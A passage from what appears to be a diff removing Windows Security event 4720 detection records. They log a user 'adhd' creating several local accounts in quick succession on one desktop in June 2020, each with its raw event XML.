-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.9622109Z'/&gt;&lt;EventRecordID&gt;4717&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Benjamin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1112&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Benjamin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Benjamin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4711</recordid>
-            <time>2020-06-11 22:05:01.885457000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.8854570Z'/&gt;&lt;EventRecordID&gt;4711&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Johnny&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1111&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Johnny&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Johnny</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4705</recordid>
-            <time>2020-06-11 22:05:01.800486500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.8004865Z'/&gt;&lt;EventRecordID&gt;4705&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Rose&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1110&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Rose&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Rose</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4699</recordid>
-            <time>2020-06-11 22:05:01.716740200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.7167402Z'/&gt;&lt;EventRecordID&gt;4699&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Judy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1109&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Judy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Judy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4693</recordid>
-            <time>2020-06-11 22:05:01.623039600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.6230396Z'/&gt;&lt;EventRecordID&gt;4693&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Bryan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1108&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Bryan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Bryan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4687</recordid>
-            <time>2020-06-11 22:05:01.524795400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.5247954Z'/&gt;&lt;EventRecordID&gt;4687&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kenneth&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1107&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kenneth&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kenneth</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4681</recordid>
-            <time>2020-06-11 22:05:01.446807700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.4468077Z'/&gt;&lt;EventRecordID&gt;4681&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Cheryl&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1106&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Cheryl&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Cheryl</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4675</recordid>
-            <time>2020-06-11 22:05:01.342370800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.3423708Z'/&gt;&lt;EventRecordID&gt;4675&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Madison&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1105&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Madison&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Madison</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4669</recordid>
-            <time>2020-06-11 22:05:01.230116100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.2301161Z'/&gt;&lt;EventRecordID&gt;4669&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Harry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1104&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Harry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Harry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4663</recordid>
-            <time>2020-06-11 22:05:01.82135100Z</time>
-            <channel>Security</channel>
